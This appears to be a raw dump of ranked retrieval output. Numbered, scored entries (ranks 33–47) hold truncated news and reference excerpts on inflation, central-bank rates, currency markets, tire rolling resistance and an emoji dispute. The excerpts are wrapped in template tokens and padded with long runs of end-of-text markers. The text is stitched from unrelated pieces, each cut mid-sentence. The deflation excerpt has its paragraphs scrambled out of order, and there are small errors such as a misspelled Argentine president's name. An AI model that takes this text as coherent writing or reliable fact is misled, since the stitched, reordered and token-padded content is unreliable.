Daily Reckoning, we like rotten countries. For example, in a state of even more advanced decay, there is Argentina, where president Cristina Fernando de Kirchner has just announced a solution to the housing problem. + +We pause to give dear readers a quick résumé of how housing got to be a problem south of the Rio Plata. In the ’80s, the generals who ran Argentina tried to pay their bills by printing money. This led to consumer price increases of more than 1,000% per year. They had to throw out one currency, start a new one, and then throw that one out too. And then there was the war with England. Eventually, people got sick of it and threw the generals out. Then, President Carlos Menem promised a “hard” currency for Argentina, which he would achieve by tying the peso directly to the dollar. + +No one is more persuasive than an Argentine when he is trying to borrow money. And since the currency risk was eliminated — or so investors thought — the Argentines soon were able to borrow more money than they could possibly repay, which led to the biggest default — about $100 billion — in world history. + +The official inflation rate is now still in single digits. But the actual inflation rate — which is apparently illegal to report — is near 25%. This — +================================================================================ +Rank = 33; Score = 1687552.0 +<|begin_of_text|>Despite several quarters of rising GDP, and the upbeat exertions of Administration spokespeople, the National Bureau of Economic Research (NBER) has yet to announce the recession is over. Their reluctance is well-founded. It is beginning to dawn on even the more optimistic analysts that the tepid growth we have seen over the past three quarters is only an interlude in an otherwise grave and prolonged recession. Moreover, the respite will cost dearly as the United States has racked up a generation worth of debt for dubious benefit. + +The paltry number of new jobs currently being created still fall far short of the 375,000 per month needed to offset the 125,000 new entrants to the job market due to population growth and to erode the 8 million people laid off in the past year alone. Meanwhile, house prices continue to fall and credit continues to contract. With retail sales dropping in June and the Leading Economic Index (LEI) standing at minus 7.7 per cent, it should be clear that the US economy is heading back towards recession, following a temporary distortion created by some $1.3 trillion in federal stimulus. In short, the stimulus has failed. + +While there can be no doubt that an increase in government spending will result in a boost to GDP figures, the evidence of history shows that such growth is short-lived. Unfortunately as leaders around the world look to tighten the reins on out of control spending, President Obama and his Democratic supporters in Congress believe that their stimulus actions have succeeded and should be redoubled. Armed with nothing more than faith in government and a belief that spending is both a means and an end, it appears that the US stimulus policy will continue. The net result of these efforts will not be a more vibrant economy, but the perpetuation of fear and confusion in the business community and the continuing expansion of deficits that will lead inevitably to higher taxes. + +The more indebted an economy becomes, the greater the burden that must be borne by the wealth-creating private sector. Indeed, at the present rate of government debt-financing, the private sector will have to contribute some $2 trillion each year in interest costs alone. This money must be raised by taxation or inflation. + +This week, in response to their fears of increased regulations, higher taxes, and greater government stewardship of the economy, discontent among business leaders flared into the open. Gathering in Washington, leaders of the US Chamber of Commerce lashed out at current regulatory changes in healthcare. In other forums, business executives and investors questioned the efficacy of the +================================================================================ +Rank = 34; Score = 1613824.0 +<|begin_of_text|>This is the new UCLA Anderson Forecast and Ceridian Corporation index using real-time diesel fuel consumption data: Pulse of Commerce IndexTM + +Press Release: March PCI Increase Indicates U.S. Economy on 4 Percent Growth Track + +Ceridian-UCLA Pulse of Commerce Index™ (PCI) by UCLA Anderson School of Management staged a healthy comeback in March, with the PCI growing by 1 percent, making up for February’s snowstorm-induced decline of 0.7 percent. The adjusted index grew from 107.4 to 108.5, continuing its climb from a recessionary low of 100.7 in June 2009.... [T]he March PCI shows growth over the prior year period for the fourth consecutive month. This follows twenty-two consecutive months of year-over-year declines experienced prior to December 2009. + +... + +“The good news in March is that the economy is still recovering at a pace that should support job growth, although unfortunately not at a pace that will drive rapid improvement in the unemployment rate. GDP needs to grow at a 5 to 6 percent rate to drive meaningful change in unemployment,” said Ed Leamer, chief economist for the PCI. + +For the first quarter of 2010, the PCI grew at an annualized rate of 9.7 percent, a solid gain but not enough to offset the declines of 14 percent and 16 percent suffered in the fourth quarter of 2008 and the first quarter of 2009. “In other words, we fell into the recession much more rapidly than we are climbing out of it,” Leamer said. + +Click on graph for larger image in new window. + +This graph shows the index since January 1999 (monthly and 3 month average). There is significant variability month to month.Note: This index appears to lead Industrial Production (IP), but there is a significant amount of monthly noise.This is a new index and might be interesting to follow along with the Trucking and Railroad data.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 35; Score = 1605632.0 +<|begin_of_text|>Reserve Bank of India (RBI) governor Raghuram Rajan dashed expectations of the government, consumers and business leaders as he kept lending rates unchanged on Tuesday despite plunging inflation and mounting pressure to ease borrowing costs to aid a revival. + +Unchanged interest rates would imply your home loan EMIs, which eat away large chunks of household incomes, are unlikely to fall anytime soon. + +High loan rates could influence people’s decision to buy houses, cars and other consumer goods, mostly bought through loans. + +The benchmark lending rate has remained unchanged since January last year, demonstrating the RBI governor’s unwavering commitment to keep inflation firmly bottled up for longer period of time, before softening of the rather hawkish stance. + +Budding revival signs in the broader economy and falling inflation rates had rekindled hopes that the RBI would lower loan rates to assist companies’ investment plans, critical to spin jobs and multiply income. + +Rajan retained the repo rate -- the rate at which banks borrow from RBI -- at 8%, and kept the cash reserve ratio (CRR)-- the proportion of deposits banks to have to park with the central bank -- at 4%, in the bi-month monetary policy review. + +Retail inflation eased in to a three-year low of 5.52% in October, below the central bank's target of 6% by 2016. + +India’s wholesale inflation rate -- the main gauge to capture country-wide price movements -- has also plunged to a five-year low of 1.77% in October, triggering a chorus of demand for lower borrowing costs to boost investment and consumer spending. + +The next monetary policy is scheduled for February 3, 2015, but Rajan did not rule out a rate revision outside of the policy calendar depending on future price movements. + +“A change in the monetary policy stance at the current juncture is premature. However, if the current inflation momentum and changes in inflationary expectations continue, and fiscal developments are encouraging, a change in the monetary policy stance is likely early next year, including outside the policy review cycle,” Rajan said. + +Analysts said the RBI governor could wait for cues to come from the next year’s Union budget in February before initiating any rate action. + +Industry leaders have been ratcheting up their demand for cheaper loans with the government also hoping that the central bank would signal a reversal of its prolonged hawkish stance that some see as affecting capacity expansion plans. + +According to experts low and stable interest rates are critical to fast-track roads, ports, airports, and railways projects to create +================================================================================ +Rank = 36; Score = 1564672.0 +<|begin_of_text|>Most Americans enjoy a good cup of coffee. Yet very few realize that coffee futures are now up over 50 percent for 2010. Creative packaging that includes smaller quantities but offers the same price helps delude many Americans into thinking their dollar still has the purchasing power of better days. This all occurs in a relatively subtle and typically hidden process. Cotton for example is now up 90 percent for the year. Corn is up over 40 percent. It would be one thing if this was all based purely on demand but more of this increase in price is coming from the Federal Reserve pursuing actions that are punishing the U.S. Dollar. The below chart is rather startling and shows that even though the CPI has remained weak, principally because of the crashing housing market, many other areas are seeing incredible price increases. + +The S&P 500 is up a good 9 percent for the year but that pales in comparison to other sectors: + +Source: Finviz + +Notice that orange juice is now more expensive? Probably because it is up 20 percent for the year. We also need to remember that the working and middle class feel much poorer because even if wages remain stagnant, the cost of daily goods and items has steadily increased. Part of this doesn’t show up in the CPI because of the large dominance of “owner’s equivalent of rent” which has held the index lower for a good time now. But even oil is reflecting the weakness of the dollar: + +Clearly gas prices are not going down. The dollar weakness is already showing up in crude prices because people are having less faith in the dollar especially when the Federal Reserve can go off and print money on whatever whim they desire. Did Congress have any thorough vote regarding quantitative easing? It just seems that the Fed can ram down whatever policy it likes and condemn the middle class in the U.S. to a currency that is weaker and weaker. The Fed and the U.S. Treasury won’t openly say this but what they are doing is exporting the U.S. middle class around the globe and lowering the standard of living for most Americans because of their goal of maintaining the current monetary and banking system in place. + +If you think the banking system is doing well just look at non-performing loans: + +Source: iTulip + +Many Americans are having a tough time paying their debts. Housing, the place where most Americans have their net worth is down by $4.7 trillion since the first quarter of 2007. The wealth effect is showing that it cuts both ways and many are now feeling the pinch. Banks are +================================================================================ +Rank = 37; Score = 1499136.0 +<|begin_of_text|>We tend to think of inflation as a singular force that affects everyone the same way. It turns out however that the poorest households may have m'ore to lose as the peso shrinks. In this photo is a 100 trillion Zimbabwe dollar bill, commonplace during its period of hyperinflation. (Photo: Paul/Flickr, CC BY 2.0) + +This content is also available on Medium + +Everyone knows about inflation - a pervasive, unstoppable force that moves prices (and hopefully wages) upward in the economy, but do we really understand it? Further analysis reveals that official overall inflation statistics understate the effect of rising prices on the poor. + +Understanding Inflation + +Inflation is measured through changes in what is called the Consumer Price Index or CPI. This is an aggregate measure of prices based on a certain ‘basket’ of goods composed of those typically consumed by households. It seems like a fair enough way to measure general price increases, but it has the effect of making you think that inflation affects everyone equally - it does not. + +The basket of goods is an approximation of the average proportions that households consume. It turns out, however, that there are significant differences in the basket of goods for households from different income levels: + +Lower income classes tend to spend more of their income on Food & Beverage, and this proportion drops as we move up the income scale. This is because the absolute level of food consumed in the household is limited, and extra income is allocated to certain ‘luxuries’ and other necessities, evidenced by the fact that higher income households spend more of their income on the other, non-food categories. + +Just as a validity check: the data that we generated from the FIES raw data closely approximates the official NSO weighting, except for food and housing. I suspect that imputed rental value was used by the NSO instead of actual rentals paid, but since there was no breakdown in the CPI Technical Notes, I can’t say for sure. Nevertheless, it is the variance in the effect, not the absolute effect, that we are interested in. + +So what does this mean? Different income classes will experience different inflation burdens because the prices of goods and services that they consume rise at different rates: + +Since the base year 2006, essentials such as food and beverage and education have risen much more than the overall inflation rate. This means that poorer households that spend more of their income on food and beverage will feel a stronger pinch from price increases. Non-essential goods’ prices have risen slower than inflation except for Alcohol & Tobacco which were +================================================================================ +Rank = 38; Score = 1482752.0 +<|begin_of_text|>On Monday, Dr. Guth’s starship came in. Radio astronomers reported that they had seen the beginning of the Big Bang, and that his hypothesis, known undramatically as inflation, looked right. + +Reaching back across 13.8 billion years to the first sliver of cosmic time with telescopes at the South Pole, a team of astronomers led by John M. Kovac of the Harvard-Smithsonian Center for Astrophysics detected ripples in the fabric of space-time — so-called gravitational waves — the signature of a universe being wrenched violently apart when it was roughly a trillionth of a trillionth of a trillionth of a second old. They are the long-sought smoking-gun evidence of inflation, proof, Dr. Kovac and his colleagues say, that Dr. Guth was correct. + +Inflation has been the workhorse of cosmology for 35 years, though many, including Dr. Guth, wondered whether it could ever be proved. + +If corroborated, Dr. Kovac’s work will stand as a landmark in science comparable to the recent discovery of dark energy pushing the universe apart, or of the Big Bang itself. It would open vast realms of time and space and energy to science and speculation. + +Confirming inflation would mean that the universe we see, extending 14 billion light-years in space with its hundreds of billions of galaxies, is only an infinitesimal patch in a larger cosmos whose extent, architecture and fate are unknowable. Moreover, beyond our own universe there might be an endless number of other universes bubbling into frothy eternity, like a pot of pasta water boiling over.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 39; Score = 1466368.0 +<|begin_of_text|>City analysts say rise in value of sterling is not vote of confidence in UK – but rather vote of no confidence in eurozone + +Sterling climbed to its highest level against the euro in almost two years on Monday as concerns grew in the financial markets about the deepening crisis in the single currency. + +A pound at one stage bought more than €1.23 on the foreign exchanges – making foreign holidays cheaper but UK exports to the single-currency zone more expensive. + +Fears that "austerity fatigue" is setting in among voters were heightened after figures were released showing that Spain – the country thought to be next in line for a bailout – has slid back into recession. + +The pound was also stronger against the US dollar, where last week's weaker-than-expected growth figures for the first three months of 2012 were followed by a closely watched barometer of business in Chicago. Although figures last week showed the UK economy suffering from a double-dip recession, dealers are now anxious that the recovery in the world's biggest economy is losing momentum. + +City analysts said the rise in the value of the pound was not a vote of confidence in the UK but rather a vote of no confidence in the eurozone, where growth prospects are deemed to be worse than they are in Britain. Speculation that the Bank of England will be reluctant to expand its £325bn quantitative easing programme has also underpinned the pound over the past month, a period when pressure has mounted on bond markets in Spain and Italy. + +Valentin Marinov, currency analyst with CitiFX in New York, said the next few days could be crucial for the pound because the monthly Purchasing Manager Index (PMI) surveys starting on Tuesday of manufacturing, construction and services would be closely watched for evidence that last week's figures showing a 0.2% drop in gross domestic product in the first three months of the year gave a false picture of the true state of the economy. + +"The reason for that is the fact that investors largely ignored the very disappointing quarter one GDP data released last week on the grounds that the PMIs were largely upbeat. Indications that the sentiment indicators declined more than expected in April could undermine to a degree market confidence that the UK growth figures will be revised significantly to the upside in coming weeks. In turn, renewed growth concerns could erode some of the interest rate advantage of sterling ahead of the regular Bank of England meeting and the release of the Bank's inflation report in the next couple of weeks." + +Dealers are looking to see whether the pound can break through €1 +================================================================================ +Rank = 40; Score = 1458176.0 +<|begin_of_text|>Should we expect prices to fall all the way back? Well, in the late 1980s, Los Angeles experienced a large localized housing bubble: real home prices rose about 50 percent before the bubble popped. Home prices then proceeded to fall by a quarter, which combined with ongoing inflation brought real housing prices right back to their prebubble level. + +And here’s the thing: this process took more than five years — L.A. home prices didn’t bottom out until the mid-1990s. If the current housing slump runs on the same schedule, we won’t be seeing a recovery until 2011 or later. + +What about the broader economy? You might be tempted to take comfort from the fact that the last two recessions, in 1990-1991 and 2001, were both quite short. But in each case, the official end of the recession was followed by a long period of sluggish economic growth and rising unemployment that felt to most Americans like a continued recession. + +Photo + +Thus, the 1990 recession officially ended in March 1991, but unemployment kept rising through much of 1992, allowing Bill Clinton to win the election on the basis of the economy, stupid. The next recession officially began in March 2001 and ended in November, but unemployment kept rising until June 2003. + +These prolonged recession-like episodes probably reflect the changing nature of the business cycle. Earlier recessions were more or less deliberately engineered by the Federal Reserve, which raised interest rates to control inflation. Modern slumps, by contrast, have been hangovers from bouts of irrational exuberance — the savings and loan free-for-all of the 1980s, the technology bubble of the 1990s and now the housing bubble. + +Ending those old-fashioned recessions was easy because all the Fed had to do was relent. Ending modern slumps is much more difficult because the economy needs to find something to replace the burst bubble. + +Newsletter Sign Up Continue reading the main story Please verify you're not a robot by clicking the box. Invalid email address. Please re-enter. You must select a newsletter to subscribe to. Sign Up You will receive emails containing news content, updates and promotions from The New York Times. You may opt-out at any time. You agree to receive occasional updates and special offers for The New York Times's products and services. Thank you for subscribing. An error has occurred. Please try again later. View all New York Times newsletters. + +The Fed, in particular, has a hard time getting traction in +================================================================================ +Rank = 41; Score = 1441792.0 +<|begin_of_text|>Senate Democrats on Friday told President Obama they don’t want to see cuts to Social Security, Medicare or Medicaid in his annual budget. + +Sixteen senators wrote to the president as fears persist among liberals that Obama will once again offer some entitlement cuts in his budget, which is set to be released March 4. + +In last April’s budget, Obama proposed changing the way the government calculates inflation. The change to the chained consumer price index (CPI) would have reduced retirement benefits as well as increasing some taxes. + +Obama also proposed increasing means testing for outpatient and drug benefits under Medicare. + +ADVERTISEMENT + +In total, the budget had $1 trillion in spending cuts the administration touted as a sign of Obama’s seriousness on the deficit. + +The Senate Democrats are warning that cuts to Social Security do not jive with the president’s focus on income inequality. The issue of entitlement spending is a highly charged one this election year, and many Democrats are trying to paint themselves as the party with compassion. + +“Mr. President: These are tough times for our country. With the middle class struggling and more people living in poverty than ever before, we urge you not to propose cuts in your budget to Social Security, Medicare and Medicaid benefits – cuts which would make life even more difficult for some of the most vulnerable people in America,” the senators said. + +“Social Security has not contributed one penny to the deficit,,” the letter goes on to state. “We are also opposed to shifting the cost of healthcare onto senior citizens, the poor, and the disabled by cutting Medicare and Medicaid benefits.” + +Sanders said in an interview that, given the fact the annual budget deficit has been cut in half, Obama's focus has to shift to helping the middle class and poor. + +"The focus of attention right now has got to be on the collapsing middle class," Sanders said. "What we need from the president now is a reassurance that he is not going to cut Social Security, Medicare and Medicaid." + +On Friday, White House press secretary Jay Carney was asked at the daily briefing whether chained CPI will be in the budget, and he declined to say. + +"What I can tell you is the president has demonstrated in the past and continues — and will continue to demonstrate his commitment to achieving additional deficit reduction that addresses our medium- and long-term challenges through a balanced approach," he said.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 42; Score = 1425408.0 +<|begin_of_text|>U.S. may face deflation, a problem Japan understands too well + +Economists worry that America could be edging closer to the trap that cost the other nation more than a decade of growth. + +But soon, lower prices cut into business profits, and managers begin to trim payrolls. That in turn undermines consumers' buying power, leading to more pressure on profits, jobs and wages — as well as cutbacks in expansion and in the purchase of new plants and equipment. + +When deflation begins, prices fall. At first that seems like a good thing. + +And as Tokyo's experience suggests, deflation can be at least as tough a problem as the soaring prices of inflation or the financial pain of a traditional recession. + +But increasingly, economists and other analysts are expressing concern that the United States could be edging closer to a different problem — the kind of deflationary trap that cost Japan more than a decade of growth and economic progress. + +Reporting from Washington — The White House prediction Friday that the deficit would hit a record $1.47 trillion this year poured new fuel on the fiery argument over whether the government should begin cutting back to avoid future inflation or instead keep stimulating the economy to help the still-sputtering recovery. + +Also, consumers who are financially able to buy often wait for still lower prices, adding to the deflationary trend. + +All these factors feed on one another, setting off a downward spiral that can be as hard to escape from as a stall in an airplane. + +For now, the dominant theme of the nation's economic policy debate remains centered on the comparative dangers of deficits and inflation. However, economists across the political spectrum — here and abroad — are talking more often about the potential for deflation. + +So how likely is the problem? + +The latest U.S. data are sobering: Consumer prices overall have declined in each of the last three months, putting the inflation index in June just 1.1% above a year earlier. The core inflation rate — a better gauge of where prices are going because it excludes volatile energy and food items — has dropped to a 44-year low of 0.9%. + +That's well below the 1.5%-to-2% year-over-year inflation that the Federal Reserve likes to see, and some Fed policymakers have raised concerns about the rising risk of a broad decline in prices. + +Private economists and financial experts have expressed much greater concern. + +"I think we have to take it seriously," said John Mauldin, president of Millennium Wave Advisors in Dallas, who puts the probability of def +================================================================================ +Rank = 43; Score = 1409024.0 +<|begin_of_text|>Image caption A slowdown in key sectors such as manufacturing has hurt India's growth rate + +India's economic growth rate picked up strongly in the most recent quarter, according to official figures. + +The economy expanded at an annual rate of 4.8% in the July-to-September period, up from 4.4% in the previous quarter. + +The acceleration was faster than analysts had been expecting. + +Asia's third-largest economy has been weighed down by various factors, such as high inflation, a weak currency and a drop in foreign investment. + +This is the fourth quarter in a row that India's annual growth rate has been below the 5% mark, and the previous quarter's rate of 4.4% was the lowest for four years. + +Earlier this year, the Indian prime minister's economic advisory council lowered the growth outlook for the current financial year. + +It now expects the economy to expand by 5.3% this year, down from its earlier projection of 6.4%. + +Growth hurdles + +India's economy has been hurt by a range of factors in recent months, including a slowdown in key sectors such as mining and manufacturing. + +Slowing growth, coupled with a recovery in developed markets, such as the US, has made India a less attractive option for foreign investors. + +Speculation that the US may scale back its key economic stimulus measure has seen investors pull money out of emerging markets, such as India. + +This has affected India's currency, which dipped nearly 25% against the US dollar between January and September this year. + +Though the rupee has recovered a little since then, it is still down about 13% against the dollar since the start of this year. + +That has made imports more expensive and contributed to a high rate of consumer inflation, which was 10.1% October, up from 9.84% in September. + +High food and fuel prices have contributed to inflation becoming "entrenched", finance minister P Chidambaram said. + +As a result, the central bank has had to raise the cost of borrowing in a bid to curb inflation. + +The latest interest rate rise in October saw the key rate increase to 7.75%. + +Some observers argue that high interest rates are hurting businesses and households, and having a negative impact on the economy. + +"A combination of weak investment, high inflation and tight monetary policy would not let India's economic recovery gather steam any time soon," Miguel Chanco, Asia economist at Capital Economics, told the BBC.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 44; Score = 1409024.0 +<|begin_of_text|>India has moved up in ranking from 52nd to 40th position in the Travel and Tourism Competitive Index (TTCI) of the World Economic Forum (WEF). The tourism sector in the country has been on a growth trajectory in the recent past. + +This data is based on the 2017 edition of the Travel and Tourism Competitiveness Report that features the latest iteration of the Travel & Tourism Competitiveness Index (TTCI). The TTCI benchmarks the travel and tourism competitiveness of 136 economies. The TTCI measures “the set of factors and policies that enable the sustainable development of the Travel & Tourism (T&T) sector, which in turn, contributes to the development and competitiveness of a country”. It comprises four sub-indexes, 14 pillars, and 90 individual indicators, distributed among the different pillars. + +India’s ranking in the TTCI of World Economic Forum moved from 65th position to 52nd position in 2015. This year, India has moved up by another 12 positions and ranked at the 40th position. In the last three years, India has cumulatively improved its ranking by 25 places, which is a significant achievement. + +Spain tops the 2017 edition of the TTCI global rankings for the second time, followed by France (2nd), Germany (3rd), Japan (4th, gaining five places), the United Kingdom (5th), the United States (6th, losing two places), Australia (7th), Italy (8th), Canada (9th, up one) and Switzerland (10th, losing four places). + +Dr Mahesh Sharma, Minister of State (I/C) for Tourism and Culture acknowledged the vision, guidance and support of Indian Prime Minister Narendra Modi for the tourism sector of the country that is the driving force and motivation for everyone to continuously work for the growth of Tourism in India. + +India continues to allure international tourists with its vast cultural and natural resources with a ranking of 9th and 24th respectively. In terms of price competitiveness advantage, India is ranked 10th. + +India continues to enhance its cultural resources, protecting more cultural sites and intangible expressions through UNESCO World Heritage lists, and they also increasing their digital presence. + +India is ranked 55th, up by 14 places in terms of international openness, which has been possible through stronger visa policies. Implementing both visa-on-arrival and e-visa has enabled India to rise through the ranks. + +The key reasons for India’s jump in the Travel and +================================================================================ +Rank = 45; Score = 1400832.0 +<|begin_of_text|>Low rolling resistance tires are designed to reduce the energy loss as a tire rolls, decreasing the required rolling effort — and in the case of automotive applications, improving vehicle fuel efficiency. Approximately 5–15% of the fuel consumed by a typical car may be used to overcome rolling resistance.[1] A 2003 California Energy Commission (CEC) preliminary study estimated that adoption of low-rolling resistance tires could save 1.5–4.5% of all gasoline consumption, but that current data were also insufficient to compare safety and other characteristics.[2] + +A United States National Highway Traffic Safety Administration (NHTSA) study in 2009 found that if 2% of the replacement tires would reduce their rolling resistance by 5%, there would be 7.9 million gallons fuel and 76,000 metric tons of CO2 saved annually. + +(SAE J1269 and SAE J2452) performed on new tires. + +Measuring rolling resistance in tires [ edit ] + +Rolling resistance can be expressed by the rolling resistance coefficient (RRC or C rr ), which is the value of the rolling resistance force divided by the wheel load. A lower coefficient means the tires will use less energy to travel a certain distance. The coefficient is mostly considered as independent of speed, but for precise calculations it is tabled at several speeds or an additional speed-dependent part is used. The Society of Automotive Engineers (SAE) has developed test practices to measure the RRC of tires. These tests (SAE J1269 and SAE J2452) are usually performed on new tires. + +When measured by using these standard test practices, most new passenger tires have reported RRCs ranging from 0.007 to 0.014.[3] In the case of bicycle tires, values of 0.0025 to 0.005 are achieved.[4] These coefficients are measured on rollers, with power meters on road surfaces, or with coast-down tests. In the latter two cases, the effect of air resistance must be subtracted or the tests performed at very low speeds. In 2009 The CEC used a rating called Rolling Resistance Force RRF. RRF and RRC, rolling resistance coefficient are very similar. Difference is taking the RRF and dividing it by the load(weight) to get RRC. So a Michelin Harmony tire rated at 9.45 RRF at 1000 pounds load would be.0095 RRC.[5][6] + +In Canada, Transport Canada tests will be conducted +================================================================================ +Rank = 46; Score = 1359872.0 +<|begin_of_text|>A Russian man drinks tea. REUTERS/Eduard Korniyenko Consumer confidence in Russia just sank below levels seen during the financial crisis, with almost one-fifth (18%) of Russians earning only enough to buy food and other basic necessities. + +The Nielsen Consumer Confidence Index dropped by seven points in the first quarter of 2015 to 72 points, as the recession in Russia and high consumer-price inflation have undermined optimism over the future. + +To put that number in perspective, in the first quarter of 2009 with the global financial system in free fall after the collapse of Lehman Brothers, the index never fell below 75. + +Even during the worst of the Great Recession, only 4.7% of Russians surveyed said they had enough money only for the basics. The current figure is more than three times as high as that level. + +And the rest of the statistics for the Russian domestic economy make for equally grim reading. + +According to Rosstat, the country's official statistics bureau, real disposable incomes fell for a fifth consecutive month in March, contracting at an annual rate of 1.8%. That follows falls of 1.6% in February and 0.8% over 2014 as a whole. + +Vladimir Putin attends the World Health Organization meeting on healthy lifestyle in Moscow, April 28, 2011. Reuters The figures illustrate starkly on whom the burden of Russia's recent downturn has really fallen. While the country's banks and state-owned enterprises have been the recipients of billions of dollars of bailout cash, the country's citizens have had to take on the burden of runaway inflation (now around 17%), shortages of Western food imports, and a stagnating domestic economy. + +According to the Russian business news site RBC, 55% of Russians are now being forced to save for clothes, with 48% saying they are reducing the money they plan to spend on vacations. + +The Russian central bank has repeatedly stressed the importance of focusing on the weakness of the domestic economy over recent months. It has pointed to weak labour productivity, low levels of investment, and declining consumer demand as causes for concern. + +The question now is whether the Kremlin has the desire or the ability to address the situation. After all, the fall in the oil price might be temporary, but the belief of its citizens in their future prosperity is what Russia desperately needs if it is to succeed in diversifying its economy away from commodity exports.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 47; Score = 1335296.0 +<|begin_of_text|>New emoji are typically proposed by the Unicode Consortium and approved for the next version of the spec without much fuss, but a rifle emoji proposed for Unicode 9.0 apparently ran into opposition from two major members of the consortium: Apple and Microsoft. + +According to a report from Buzzfeed, Apple objected to the idea of introducing a second gun emoji on its platforms, and Microsoft joined in. The decision to remove the rifle emoji, as well as a second "pentathlon" emoji depicting a man holding a pistol among other athletes, was apparently unanimous. + +“Nobody in the room seemed to mind not encoding the 